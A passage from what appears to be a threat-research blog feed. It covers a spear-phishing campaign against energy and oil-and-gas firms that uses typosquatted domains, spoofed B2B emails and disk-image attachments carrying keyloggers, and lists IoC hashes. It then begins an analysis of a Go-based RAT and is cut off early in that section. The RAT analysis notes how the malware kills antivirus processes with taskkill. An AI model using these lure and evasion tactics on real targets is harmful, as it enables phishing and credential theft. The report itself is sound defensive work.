IMG, ISO or CAB file. These file formats are commonly used by attackers to
evade detection from email-based Antivirus scanners. Once the victim opens the
attachment and clicks on one of the contained files an information stealer is
executed.&lt;/p&gt;
&lt;p&gt;Below we describe the attack vector, the attackers&amp;rsquo; motives and tactics used in
this campaign, and how you can protect your systems from this attack.&lt;/p&gt;
&lt;h2&gt;Key Findings&lt;span class="hx:absolute hx:-mt-20" id="key-findings"&gt;&lt;/span&gt;
&lt;a href="#key-findings" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;The campaign uses spoofed or typosquatted emails to make them look like part
of a normal business-to-business (B2B) correspondence.&lt;/li&gt;
&lt;li&gt;The attached file is primarily an IMG, ISO or CAB file containing information
stealer malware.&lt;/li&gt;
&lt;li&gt;The dropped malware is generally able to steal private information, log
keyboard strokes and steal browsing data.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/global-phishing-campaign-targets-energy-sector-and-its-suppliers/images/fig1.png" title="Attack Flow Targeting Energy, Oil, and Gas Companies" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Attack Flow Targeting Energy, Oil, and Gas Companies&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;The Phishing Campaign&lt;span class="hx:absolute hx:-mt-20" id="the-phishing-campaign"&gt;&lt;/span&gt;
&lt;a href="#the-phishing-campaign" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Recently, we have identified a number of IMG files with names related to the
oil &amp;amp; gas and energy industries. Inside these image files are predominantly
.NET malware. Upon further investigation the distribution method for this
malware appears to be
&lt;a href="https://intezer.com/blog/incident-response/automated-phishing-investigation/"target="_blank" rel="noopener"&gt;spear phishing emails&lt;/a&gt;,
with either an IMG, ISO, or CAB file included as an attachment and sent to
specific targets. The IMG/ISO files are part of the
&lt;a href="https://en.wikipedia.org/wiki/Universal_Disk_Format"target="_blank" rel="noopener"&gt;Universal Disk Format&lt;/a&gt;
(UDF) which are disk images commonly used for DVDs. Cabinet (CAB) files are a
type of archive file. In most of these emails the file name and icon of the
attachment mimics
&lt;a href="https://intezer.com/blog/incident-response/analyze-malicious-pdf-files/"target="_blank" rel="noopener"&gt;a PDF file&lt;/a&gt;.
The purpose is to make the file look less suspicious, enticing the targeted
individual to open and read it.&lt;/p&gt;
&lt;p&gt;The campaign targets major companies from around the world, including the
United States, United Arab Emirates (UAE) and Germany, but its primary targets
are South Korean companies. The targeted industries are wide-ranging but mostly
focused on the energy sector, including oil and gas companies.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Energy&lt;/li&gt;
&lt;li&gt;Oil &amp;amp; Gas&lt;/li&gt;
&lt;li&gt;Information Technology&lt;/li&gt;
&lt;li&gt;Manufacturing&lt;/li&gt;
&lt;li&gt;Media&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;The Spear Phishing Emails&lt;span class="hx:absolute hx:-mt-20" id="the-spear-phishing-emails"&gt;&lt;/span&gt;
&lt;a href="#the-spear-phishing-emails" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;The phishing emails are formatted to look like valid correspondence between two
companies. This extra effort made by the attacker is likely to increase the
credibility of the emails and lure victims into opening the malicious
attachments. The emails use social engineering tactics such as making
references to executives, using physical addresses, logos and emails of
legitimate companies. They also include requests for quotations (RFQ),
contracts, and referrals/tenders to real projects related to the business of
the targeted company.&lt;/p&gt;
&lt;p&gt;The content of the emails demonstrates that the threat actor is well-versed in
business-to-business (B2B) correspondence. The recipient email addresses of
these emails range from generic email handles such as
&lt;code&gt;info@target_company[.]com&lt;/code&gt; or &lt;code&gt;sales@target_company[.]com&lt;/code&gt; to specific people
within companies. This suggests that for some companies they have likely
managed to gather more intelligence during reconnaissance than others.&lt;/p&gt;
&lt;p&gt;An example of one of the emails involved in the campaign (image below) uses a
combined cycle power plant (CCPP) project in Panama as a lure. The email
pretends to be sent from Hyundai Engineering Co (HEC). The email asks the
receiver to submit a bid for the supply of equipment in the project and states
that more details and requirements can be found in the attached file
(containing the malware). The email presents a strict deadline for which the
request for the bid should be submitted.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/global-phishing-campaign-targets-energy-sector-and-its-suppliers/images/fig2.png" title="Phishing email inviting recipient to participate in a project." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Phishing email inviting recipient to participate in a project.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Upon opening the disk image file the target is presented with an executable.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/global-phishing-campaign-targets-energy-sector-and-its-suppliers/images/fig3.png" title="Malicious file contained in the disk image." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Malicious file contained in the disk image.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Phishing Email Tactics&lt;span class="hx:absolute hx:-mt-20" id="phishing-email-tactics"&gt;&lt;/span&gt;
&lt;a href="#phishing-email-tactics" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;h3&gt;Typosquatting&lt;span class="hx:absolute hx:-mt-20" id="typosquatting"&gt;&lt;/span&gt;
&lt;a href="#typosquatting" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;In several emails it appears the sender domains have been typosquatted in order
to increase the credibility of the spear phishing attempt. Typosquatted domains
are a technique used to social engineer email recipients into thinking an email
has been sent from a trusted entity. This technique is performed by registering
a domain name which mimics a legitimate domain. When viewed quickly it can
increase the chances of the recipient thinking that the email has been sent
from a legitimate company.&lt;/p&gt;
&lt;p&gt;In this campaign, many of the typosquatted domains mimic South Korean companies
with legitimate domains in the format of &lt;code&gt;&amp;lt;company.co.kr&amp;gt;&lt;/code&gt;. Typosquatting is
achieved by registering a domain without the second level &lt;code&gt;.co&lt;/code&gt; and instead
registering the domain as &lt;code&gt;&amp;lt;company-co.kr&amp;gt;&lt;/code&gt;. One example of this is the domain
&lt;code&gt;&amp;lt;hec-co.kr&amp;gt;&lt;/code&gt;, registered by the attackers to typosquat the legitimate domain
for the company Hyundai Engineering (&lt;code&gt;hec.co.kr&lt;/code&gt;). The typosquatted email from
&amp;ldquo;Hyundai Engineering&amp;rdquo; invites the recipient to reply to a confidentiality
agreement with respect to a refinery expansion project.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/global-phishing-campaign-targets-energy-sector-and-its-suppliers/images/fig4.png" title="Email sent from typosquatted domain (jeongwan@hec-co.kr)." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Email sent from typosquatted domain (jeongwan@hec-co.kr).&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Another typosquatted email that caught our attention was supposedly sent by
Barend Jenje from GustoMSC, asking to return a signed non-disclosure agreement
(NDA). The attachment was just an IMG file containing a malware executable.&lt;/p&gt;
&lt;p&gt;GustoMSC is based in The Netherlands, specializing in offshore equipment and
technology for the oil &amp;amp; gas industry. On June 14, 2021,
&lt;a href="https://www.gustomsc.com/news/scam-alert"target="_blank" rel="noopener"&gt;GustoMSC posted an alert&lt;/a&gt; on their
site warning users that the company&amp;rsquo;s domain was being typosquatted and
scammers were sending emails on behalf of their employees.&lt;/p&gt;
&lt;p&gt;The email below references the Dunkirk offshore wind farm project to add
credibility to the message. The project was granted to the Éoliennes en Mer de
Dunkerque (EMD) consortium by the French government in June 2019. The
consortium is made up of several companies, two of which are mentioned in the
email: EDF Renouvelables and Enbridge. In
&lt;a href="https://renews.biz/69489/edf-team-move-ahead-with-dunkirk-offshore-wind/"target="_blank" rel="noopener"&gt;recent news&lt;/a&gt;,
the companies announced their decision to move forward with the development of
the project beginning in the second half of 2021.&lt;/p&gt;
&lt;p&gt;It would make sense then why the attackers name dropped this project, due to
its recent developments and also because the offshore wind farm is under the
occupation of GustoMSC.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/global-phishing-campaign-targets-energy-sector-and-its-suppliers/images/fig5.png" title="Phishing email impersonating GustoMSC." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Phishing email impersonating GustoMSC.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Email Spoofing&lt;span class="hx:absolute hx:-mt-20" id="email-spoofing"&gt;&lt;/span&gt;
&lt;a href="#email-spoofing" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Many email addresses in this campaign are spoofed by the actor. Email spoofing
is another tactic that is used to social engineer targets into opening emails.
Email spoofing is done by sending an email with forged headers to suggest that
the email is sent from a trusted or legitimate entity. An example of a spoofed
email from this campaign pretends to come from a company called Haesung Tech,
seen below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/global-phishing-campaign-targets-energy-sector-and-its-suppliers/images/fig6.png" title="Spoofed email pretending to be sent from Haesung Tech." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Spoofed email pretending to be sent from Haesung Tech.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;This email is clearly spoofed since inside the header the Sender Policy
Framework (SPF) check does not pass. The reason for this is there is no DNS TXT
record for &lt;code&gt;haesungtech.com&lt;/code&gt; that defines a permitted sender. The SPF verdict
is shown below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/global-phishing-campaign-targets-energy-sector-and-its-suppliers/images/fig7.png" title="Sender Policy Framework (SPF) verdict." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Sender Policy Framework (SPF) verdict.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;The Malware&lt;span class="hx:absolute hx:-mt-20" id="the-malware"&gt;&lt;/span&gt;
&lt;a href="#the-malware" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;This campaign uses several known Remote Access Tools (RATs) and information
stealing malware contained in the files attached to the phishing emails.
Although the threats belong to different malware families, they do share a
number of capabilities including: stealing private and banking information,
logging keyboard strokes and stealing browsing data.&lt;/p&gt;
&lt;p&gt;There are several known malware-as-a-service (MaaS) threats like Formbook and
Agent Tesla used in this campaign. Other threats we have identified are Loki,
Snake Keylogger and AZORult.&lt;/p&gt;
&lt;h3&gt;Email File Attachments&lt;span class="hx:absolute hx:-mt-20" id="email-file-attachments"&gt;&lt;/span&gt;
&lt;a href="#email-file-attachments" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Each email has an attached file containing one or more executables encapsulated
inside an IMG, ISO, or CAB file, each belonging to one of the threats mentioned
above. In Windows 8 and Windows 10, simply double-clicking on virtual disk
files will automatically mount its content. This feature is appealing for
threat actors because it takes a small number of user clicks to execute the
malware. In addition, traditional email defenders do not handle disk image
files as well as more common formats such as ZIP files. Therefore, it&amp;rsquo;s more
likely that the malicious emails will end up in the inbox of the recipients
without being blocked. One of the emails we analyzed was allegedly sent by
Rashid Mahmood from
&lt;a href="http://cpecc.cnpc.com.cn/cpeccen/"target="_blank" rel="noopener"&gt;China Petroleum Engineering &amp;amp; Construction Corporation&lt;/a&gt;
(CPECC), a subsidiary of the China National Petroleum Corporation. The
recipient of the phishing email works for a company called
&lt;a href="http://www.gsenc.com/"target="_blank" rel="noopener"&gt;GS E&amp;amp;C&lt;/a&gt;, a Korean EPC contractor engaged in various
global power plant projects.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/global-phishing-campaign-targets-energy-sector-and-its-suppliers/images/fig8.png" title="Phishing email sent to GS E&amp;amp;C." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Phishing email sent to GS E&amp;amp;C.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The email contains a reference to the
&lt;a href="https://www.nsenergybusiness.com/projects/bab-onshore-oil-field-expansion/"target="_blank" rel="noopener"&gt;expansion project&lt;/a&gt;
of an oil field in Abu Dhabi called
&lt;a href="https://www.adnoc.ae/en/our-projects/bab-epc"target="_blank" rel="noopener"&gt;BAB&lt;/a&gt;. BAB is the oldest
operating oil field in the United Arab Emirates (UAE). The receiver of this
email, who works at GS E&amp;amp;C (a Seoul-based global contractor for oil and gas,
power plants, and renewable energy), is invited to submit both technical and
commercial offers for the items described in the attached material take off
(MTO) document (below).&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/global-phishing-campaign-targets-energy-sector-and-its-suppliers/images/fig9.png" title="Second part of the phishing email sent to employee at GS E&amp;amp;C." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Second part of the phishing email sent to employee at GS E&amp;amp;C.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;There is a typo in the email below. Instead of &amp;ldquo;regional headquarters&amp;rdquo; the
address says &amp;ldquo;Reginal Headquarter.&amp;rdquo; In addition to this mistake, the address
provided is the actual
&lt;a href="https://ae.arabplaces.com/abu-dhabi/cpecc-87624"target="_blank" rel="noopener"&gt;address&lt;/a&gt; of CPECC in UAE.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/global-phishing-campaign-targets-energy-sector-and-its-suppliers/images/fig10.png" title="Phishing email with a typo." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Phishing email with a typo.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Though the attached file has a seemingly complementary name related to the
contents of the email, it is actually an IMG file that contains Snake Keylogger
malware. Once the user double-clicks on the IMG file, the content of the file
is mounted, as shown below, and the user can click the file to be executed.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/global-phishing-campaign-targets-energy-sector-and-its-suppliers/images/fig11.png" title="Mounted disk image file with malicious Snake Keylogger binary masquerading as PDF." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Mounted disk image file with malicious Snake Keylogger binary masquerading as PDF.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Fileless Malware Execution&lt;span class="hx:absolute hx:-mt-20" id="fileless-malware-execution"&gt;&lt;/span&gt;
&lt;a href="#fileless-malware-execution" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;To bypass detection from standard antiviruses, the execution of the malware is
fileless, meaning that it is loaded into memory without creating a file on
disk. In this case, it performs the same loading and execution process used to
load Agent Tesla as reported by
&lt;a href="https://blogs.blackberry.com/en/2021/06/threat-thursday-agent-tesla-infostealer-malware"target="_blank" rel="noopener"&gt;BlackBerry&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We uploaded the attached file to
&lt;a href="https://analyze.intezer.com/files/3da25300ec711385344467823ae229bbc25a9a5a7caeccd911875994ed74c5b9/sub/5cb3737a-02b7-4945-b38c-d9aa9f8c934b"target="_blank" rel="noopener"&gt;Intezer&lt;/a&gt;
for investigation. The file contains a malicious PE file that shares code with
other Snake Keylogger samples.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/07/global-phishing-campaign-targets-energy-sector-and-its-suppliers/images/fig12.png" title="Genetic analysis of the ISO sample containing Snake Keylogger." alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Genetic analysis of the ISO sample containing Snake Keylogger.&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Targeting Companies in Religion Media Business&lt;span class="hx:absolute hx:-mt-20" id="targeting-companies-in-religion-media-business"&gt;&lt;/span&gt;
&lt;a href="#targeting-companies-in-religion-media-business" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Among the targeted companies there is one that differs drastically from the
others. The company is &lt;a href="http://www.febc.net/intro"target="_blank" rel="noopener"&gt;FEBC&lt;/a&gt;, a religious Korean
Christian radio broadcaster that reaches other countries outside of South
Korea, many of these countries which downplay or ban religion. One of FEBC&amp;rsquo;s
goals is to subvert the religion ban in North Korea.&lt;/p&gt;
&lt;h2&gt;Recommendations for Energy Sector Businesses&lt;span class="hx:absolute hx:-mt-20" id="recommendations-for-energy-sector-businesses"&gt;&lt;/span&gt;
&lt;a href="#recommendations-for-energy-sector-businesses" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Treat emails with awareness and caution, especially emails that are received
from outside your company&amp;rsquo;s domain. Most importantly, don&amp;rsquo;t open suspicious
files or links.&lt;/p&gt;
&lt;p&gt;Fileless malware is now very common. A recent
&lt;a href="https://www.pandasecurity.com/en/mediacenter/news/internet-security-report-q4-watchguard/"target="_blank" rel="noopener"&gt;blog&lt;/a&gt;
by Panda Security states that fileless malware rates in 2020 increased by 888%
over 2019. Therefore, it is important to ensure that your organization&amp;rsquo;s
security strategy includes software that is able to detect malware injected and
executed in-memory. In case you come across a suspicious file, you can upload
it to &lt;a href="http://analyze.intezer.com/sign-in"target="_blank" rel="noopener"&gt;Intezer Analyze&lt;/a&gt; to get an immediate
verdict (trusted or malicious) and malware family classification if it is
indeed a malicious file. The platform supports a wide range of file formats,
including Windows and Linux executables, scripts and documents.&lt;/p&gt;
&lt;p&gt;To summarize, don&amp;rsquo;t click on suspicious emails and make sure you have a
solution that handles fileless malware in-memory effectively. Intezer Analyze
can help you with the latter.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Intezer Analyze now supports non-executable files such as Microsoft Office
documents, PDF files, and scripts such as PowerShell and VBS.&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;IoCs&lt;span class="hx:absolute hx:-mt-20" id="iocs"&gt;&lt;/span&gt;
&lt;a href="#iocs" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;ul&gt;
&lt;li&gt;Email: &lt;code&gt;1c85618ef82808c9bcc6deddf93b66d6ee7a81b82c03341ecbf61d3ee4975bb3&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;74109522b38c609b4c576eecde644ffe544fcdc9a6494a9683f8eea6fb9e0bc7&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;cd77a054500efdac4d39d743ad83f963c738d6f2b6b53f5c4b5818d34742f02b&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;3da25300ec711385344467823ae229bbc25a9a5a7caeccd911875994ed74c5b9&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;8877b6a829967924063e85120bf22b2ccc511fa25e376b479213020a15482bf6&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;0dc594a10793d93e26584d8dcd4d811c4b2ccb017b86eb1119380f17e3606f85&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;b51e83fd2583c8e92ef34f6b8d23e07aaa82eedcf2db4b68e667f3a52c8862f5&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;079c7d83465481952407f3da954e08a5f165ff5480e2a51c32505088e78750f5&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;53e3ae371a3e329c6ed4942eb6cc51007c53008e3b9da6fccaecbed8f68f2ffa&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;96ff156bd7b09ec5a6216f43c0de578aafa9a8103832a401ce156e2ee918f580&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;ff5be1c9c0ee11ceca68c10a9bcd1f8a995be8e3f89ed17a4933adde010ac3ad&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;d5080a9391b2ad1a75deeee81db15be47be2b0742378f633081eb4c9f81226ad&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;a722bde3892eeaafdd285b6e9aabc67f0ad8dc8abe4035a8ff11671a7c2a68b1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;01970569f16e4adfdd4afb50d7a85327e8eb6abd7cb61a446e4a6f1010835968&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;0ab00782d02cb0e817b0237007b6b7f81139ff6ded17bc42fbf277e929b77ccf&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;3d8d4fbf52301ea8dca5602d6c86da3d82fd659074d7868938064e84c7ad424a&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;ee7a4274d02042c8e516de2695ced13f4623c96377762f088d7795d5b0b2bd6f&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;0ea3575eed95cf60b1efb487a350a9fa24fd77482e881020a9a0f77220a6ad33&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;102adafddb589d6739ce8a489054825a9a958baa01e87b95eebdc302675a3bd9&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;9644169dee32d60f41d8d4e1f3dfb45a930ad3efd993fe941647549cf5e924dd&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;e2adb897c29a67295a2b411c47ee76e1e9ce1e27dccf259bc42a84c481ae41ce&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;a03c0a2b6458cf55ee800291cf6b4698d1450bddd6d9e3e02f963c465004ac5c&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;f1e85b9f7b1c2a6ce9da528dbfe2c66f0a0f513f39411dbf7bb7d4d917e1ba99&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;0840cff0a98daa3962236913952b7b16896cae63af24fa99e46f3371c0e1ca49&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;6a99c482b1634f3d0c775f4c8a0d1bb04cd24a0f54f1f48d1ee2697f5bf1c6c3&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;86ebf42301074e2907578e98dc20c46f6ecf9789503c625e2b2abfcb2af847b2&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;079c7d83465481952407f3da954e08a5f165ff5480e2a51c32505088e78750f5&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;53e3ae371a3e329c6ed4942eb6cc51007c53008e3b9da6fccaecbed8f68f2ffa&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;96ff156bd7b09ec5a6216f43c0de578aafa9a8103832a401ce156e2ee918f580&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;5384a56a7d814aea903c33fbd602a3e3d5bc637b6e3bc0bd4568d4b7b99db2ad&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;f873b017cb3063a499db2874275e4797b8412ccd1300d29f4f1af03d66ee6700&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;8620f85ffd045187ffbc5d7e70df01d8a04e7fc5c69048b152f2b7284d20caf1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;06a3fe74ff3dd352db742ac96c6fbd0da1a0d98164dda2a6637e809ec0f48b35&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;b552939890305a0a0d2c9af8973a7d04b1593d9f512c0cc485a0b987f4293d97&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;8e2c23037b36f558920f626e7ef8767daa55734551238eb8816abd144f27db45&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;9c55cc8f7acc09b5de745ec99b0c60862f7975eab77420e41b5c9d1351114cd9&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;d90f2a4a97cf6523e868f67356df7fc08581912c37e8f1f6ee16f2220eabdbb6&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;5db134f3aa187e74903a732b1bd55419977d66c63a55ae8952d908b8b0bc2616&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;713da8a5f0b2ee6a477a57b90834d4ae4637723ad817ffc5a53e5c86792e8ba4&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;7b57b59d06c7ef6cc6fa09fafdf427f2db5969d1b49041d1b7a992e47a9a2726&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;b06cfcc8fabebb1bc83a4dfc91c0f9ba4e23c539018bb94fef1431745c0a2506&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;87b197032a6976c18f7f3df1df6e09cf9fd6a8e4cce3f35f51b2cf521b9ca278&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;7aacd968f2cfb23a8369712c0dc60bcabc7b7d7c0ebf69863f7643e6b90e656f&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;9e9ea32799bf9a246d76b11131abf71bbcffd3b79e026e440b221f6b1bdffe90&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Email: &lt;code&gt;75ce82077ab9b2e18df87dae0e52270ae49fe20ec22f66fa3698b6fb75452e95&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;14ae4b4b66588af22cf569a90c94e9dd6e2af708ad9dc0efde0cd7d2a809fb51&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Attached file:
&lt;code&gt;60dc089158d86e9fb10ace29eb6afd7f23d001181e8a4a6ba5083c3597733a71&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Klingon RAT Holding on for Dear Life</title><link>https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/</link><pubDate>Thu, 17 Jun 2021 00:00:00 +0000</pubDate><guid>https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/</guid><description>
&lt;p&gt;With more malware written in Golang than ever before, the threat from Go-based
Remote Access Trojans (RATs) has never been higher. Not only has the number of
Go malware increased but also the sophistication of these threats. This is a
technical analysis of an advanced RAT written in Go that we are calling Klingon
RAT. The RAT is well-featured and resilient due to its multiple methods of
persistence and privilege escalation. It was determined that the RAT is being
used by cybercriminals for financial gain. It is important to stay on top of
this threat as it will degrade Antivirus security through killing targeted
processes and hiding communications through encrypted channels.&lt;/p&gt;
&lt;h2&gt;Technical Analysis&lt;span class="hx:absolute hx:-mt-20" id="technical-analysis"&gt;&lt;/span&gt;
&lt;a href="#technical-analysis" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;When searching our various hunting platforms for malware one particular sample
caught our eye. This Go sample, active since at least 2019, was flagged as
malicious but mostly unique code by our platform. It is not common to find RATs
with very few code reuse. Threat actors reuse code all the time to expedite
malware development. Since it is rare to see a RAT with such a large amount of
code written from scratch, we dug deeper down the gopher hole. This RAT is full
of tactics to combat Antiviruses, maintain persistence and escalate privileges.
It communicates encrypted with its Command and Control (C2) server using TLS
and can receive commands allowing the attacker to fully control the infected
machine.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig1.png" title="Figure 1: Old analysis with unique code" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 1: Old analysis with unique code&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Initialization&lt;span class="hx:absolute hx:-mt-20" id="initialization"&gt;&lt;/span&gt;
&lt;a href="#initialization" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The malware starts by creating an object whose purpose is to store information
about the victim machine, controller setup and paths to dropped utilities.&lt;/p&gt;
&lt;p&gt;It will then run a WMI command
(&lt;code&gt;wmic process get Caption,ParentProcessId,ProcessId&lt;/code&gt;) to get all running
processes. The returned value is parsed and stored in a slice. The malware will
check this process list and match it against a list of targeted Antivirus
processes. The &lt;code&gt;taskkill&lt;/code&gt; command is used to kill matching processes and child
processes. The targeted processes are
&lt;a href="https://gist.github.com/aslefhewqiwbepqwefbpqsciwueh/a72fc5fee38a479e48d79710cd64d7c0"target="_blank" rel="noopener"&gt;linked here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To start gathering the information on the victim machine, it will get the OS
version using the &lt;code&gt;ver&lt;/code&gt; command, then grab the username. A GET request is made
to &lt;a href="https://api.ipify.org"target="_blank" rel="noopener"&gt;https://api.ipify.org&lt;/a&gt; to get the public IP address.
Finally in this function, it will fetch the machine ID from the registry key
